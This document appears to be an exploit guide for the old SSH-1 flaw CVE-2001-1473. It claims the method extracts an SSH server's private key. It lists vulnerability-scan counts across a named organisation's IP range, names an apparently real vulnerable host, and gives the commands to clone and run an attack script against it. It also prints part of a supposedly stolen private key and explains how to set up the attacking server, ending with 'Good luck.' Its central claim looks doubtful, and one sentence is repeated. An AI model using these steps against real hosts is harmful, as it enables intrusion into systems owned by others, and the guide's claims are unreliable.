How to exploit CVE-2001-1473

We employed a novel approach to an age-old vulnerability in the SSH-1 protocol, as described by CVE-2001-1473. This vulnerability enables a Man-in-the-Middle (MITM) server to intercept an SSH-1 session between a client and a vulnerable server, potentially exposing the user’s private key. However, executing a practical attack necessitates the client’s usage of the attacking server as a hopping node and granting permission for unknown server keys, significantly increasing the complexity of a successful exploit.

Our adaptation of the original attack method enables the extraction of the SSH server’s private key itself, offering access to the vulnerable server with sshd permissions. Notably, this modified approach eliminates the MITM requirement and can be executed directly against the vulnerable server.

Statistics

The vulnerability scans performed across the Oracle IP range resulted in the following distribution:

awk '{print $1}' v* | sort | uniq -c | sort -rn

91 [CVE-2001-1473]
45 [CVE-2020-35489]
40 [CVE-2019-11248]
10 [tilda-takeover]
5 [CVE-2020-1938]
4 [wix-takeover]
4 [top-xss-params]
4 [CVE-2017-7269]
4 [CVE-2014-6271]
3 [CVE-2021-40822]
3 [CVE-2021-22205]
2 [nagios-default-login]
2 [CVE-2022-2185]
2 [CVE-2020-3452]
1 [vercel-takeover]
1 [symfony-profiler]
1 [htpasswd-detection]
1 [error-based-sql-injection:MySQL]
1 [CVE-2021-44228]
1 [CVE-2020-3187]
1 [CVE-2020-13700]
1 [CVE-2019-9670]
1 [CVE-2019-19781]
1 [CVE-2019-10232]
1 [CVE-2002-1131]
1 [apache-solr-file-read]

The CVE-2001-1473 vulnerability is widely distributed, rendering it highly appealing for exploitation.

Example

One of the vulnerable hosts detected in nuclei scan:

[CVE-2001-1473] [tcp] [high] nmr.ioc.ac.ru:22

Launching an attack:

git clone git@bitbucket.org:0xsky/cve-2001-1473.git
cd cve-2001-1473
npm i
node src/run.js -t nmr.ioc.ac.ru

pk retrieved:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA18RGKpk+UHIKVDnRcaoHI97YDp1mAu+9gMcako/uFZkRFG1p/XHz
CL+/EZ9cGc0KT6fRzAGHxxfeJ4j4gsAFzBFaMWx2jfEinduSQGdxi4JtdqCY2Y8+YrIORg
mpOtwi+Pxue1R4JndIhH+AXVUptODrU1clBtZePcLd5aG4JVzyX0c2+BA0ekadyhAySvqS
bTCTQNVt0eB0JUmHjYh3FIk9AjnAnDe6F7iPeq0dPwfSAY13QS3WGX38tMWjDHntrWACEf
9zE9QCDDquwM3hs3cah9c+jzvDK2AKD3EOwXHF8Df4CHZ2L4x3AXqxbRgZZE3+nTa0Dt4h
ITAsyKp7a0DVzCwtK0DB1LfUPkWnxeIMcZQkTdcjypr9/9VqgacHvZjmKOf3utBglHfnWk
...

Attacking system requirements

Node installed

The easiest way is to use nvm.

The POC

git clone git@bitbucket.org:0xsky/cve-2001-1473.git

8022 port unfiltered

The target SSH server establishes a connection with the attacking server via port 8022 for key exchange. Ensure that this port is unfiltered. If working from Kali’s VirtualBox, ensure incoming traffic to the port is permitted from the host. Additionally, if the host is connected to a home network router, enable port forwarding on the router.

The easiest method involves using a dedicated or VPS server (such as Amazon or any other provider) with port 8022 unblocked.

The simplest way is to use dedicated / vps server (amazon or any other provider) with 8022 port unblocked.

Attacking time

Cracking the MD5 of the server challenge and SID sent by the vulnerable server to port 8022 might require some time, particularly on older systems. The script assesses the cracking rate and provides an estimated time, which can vary from minutes to hours.

Script command line options

  • -h, --help: provides command line option summary
  • -t [ip|hostname], --target [ip|hostname]: the target system
  • -v, --verbose: be more verbose

Good luck.


See also